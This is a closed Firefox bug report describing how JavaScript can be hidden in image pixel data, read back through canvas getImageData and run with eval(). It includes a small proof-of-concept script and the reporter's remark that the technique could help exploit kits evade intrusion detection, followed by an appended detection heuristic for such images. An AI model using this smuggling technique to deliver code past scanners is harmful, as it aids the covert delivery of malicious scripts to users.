Closed Bug 813868 Opened 12 years ago Closed 12 years ago

canvas getImageData opens security hole for code

Categories: Core :: General, defect (priority: Not set, severity: normal)

Tracking: RESOLVED INVALID

People: Reporter: bertram; Unassigned

Details

Attachments (1 file): canvas.zip, 716 bytes, application/octet-stream

Attached file canvas.zip
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121025210744

Steps to reproduce:

With the canvas it is possible to read byte data out of an image.
Images themselves can come from different URLs (hosts) without restriction.
What happens when someone fills an image with code values as pixel data, loads the image into a canvas and interprets it?
He could execute code without any knowledge of any security prevention because the "code" is an image.
What I've done is simple:
1. create an image where the pixels are the color representation of
  window['alert']('xss')
  this could be a GIF, PNG... It depends on the color interpolation in the resulting image.
2. load the image into a web site
3. create a canvas object and put the image inside.
4. read the byte data of the canvas and cast it as string to eval
Et voilà

This is the small JS for it:
var img = new Image();
img.onload = function () {
  // Draw the loaded image onto a canvas of the same size.
  var ca = document.createElement('canvas');
  ca.width = this.width;
  ca.height = this.height;
  var ctx = ca.getContext('2d');
  ctx.drawImage(this, 0, 0);
  // Read the raw RGBA bytes back; every byte equal to 255 (the opaque
  // alpha channel, but also any colour channel that is 255) is skipped.
  var a = "", d = ctx.getImageData(0, 0, this.width, this.height).data;
  for (var i = 0; i < d.length; i++) {
    if (d[i] < 255) a += String.fromCharCode(d[i]);
  }
  eval(a); // the decoded bytes are executed as script
}
img.src = "exploid.gif";


Actual results:

The alert box is displayed.
OS: Linux → All
Hardware: x86_64 → All
Given https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034 this is clearly not security-sensitive.

And further, it's invalid.  The security issue is in calling eval() on untrusted strings, which a web page can get in all sorts of ways, not in getImageData.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → INVALID
Yes, eval is the real problem. But this way there is no way for any intrusion detection system to scan text and code, because it's in an image.
So for something like the BlackHole kit it would be easier to deliver any code without restriction from any prevention system.
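The decoding step in the report and the follow-up claim that a detection system cannot tell text from image data: as an added example (not part of the bug report, of Firefox, or of any scanner), a defender-side heuristic over decoded RGBA bytes in the layout getImageData().data returns. The threshold, the keyword list and both sample byte arrays are constructed assumptions for illustration.

```javascript
// Added example, not from the bug report or from Mozilla: a scanner-side
// heuristic that inspects decoded RGBA pixel bytes and flags images whose
// colour channels are really printable text, the payload shape described
// in the bug. Threshold and keyword list are assumptions for illustration.

// Decode exactly as the reporter's snippet does: keep every byte below 255.
// Note this also drops any colour channel that happens to be 255 (pure white).
function decodeLikePoc(rgba) {
  let s = "";
  for (let i = 0; i < rgba.length; i++) {
    if (rgba[i] < 255) s += String.fromCharCode(rgba[i]);
  }
  return s;
}

// Share of kept colour bytes (alpha channel excluded) that are printable ASCII.
// Photographic data scatters across 0..255; text clusters in 32..126.
function printableRatio(rgba) {
  let printable = 0, kept = 0;
  for (let i = 0; i < rgba.length; i++) {
    if (i % 4 === 3 || rgba[i] === 255) continue; // skip alpha and padding
    kept++;
    const b = rgba[i];
    if (b === 9 || b === 10 || b === 13 || (b >= 32 && b <= 126)) printable++;
  }
  return kept === 0 ? 0 : printable / kept;
}

// Flag when nearly all colour bytes are text and the decoded string carries
// script-like tokens. A detection signal, not proof; confirm by other means.
function looksLikeHiddenScript(rgba, threshold = 0.9) {
  if (printableRatio(rgba) < threshold) return false;
  const text = decodeLikePoc(rgba);
  return /\b(eval|alert|Function|document|window|script)\b|[(){}\[\];]/.test(text);
}

// Constructed sample inputs (not real image data): four RGBA pixels each.
// PAYLOAD packs "alert('x')" three characters per pixel, padded with 255.
const PAYLOAD = new Uint8ClampedArray([
  97, 108, 101, 255, 114, 116, 40, 255, 39, 120, 39, 255, 41, 255, 255, 255,
]);
// PHOTO is arbitrary colour noise with opaque alpha.
const PHOTO = new Uint8ClampedArray([
  12, 200, 37, 255, 180, 5, 99, 255, 7, 231, 160, 255, 250, 3, 17, 255,
]);

console.log(decodeLikePoc(PAYLOAD), looksLikeHiddenScript(PAYLOAD), looksLikeHiddenScript(PHOTO));
```

The ratio check is what separates the two inputs; the token test only keeps ordinary text files rendered as images from being flagged.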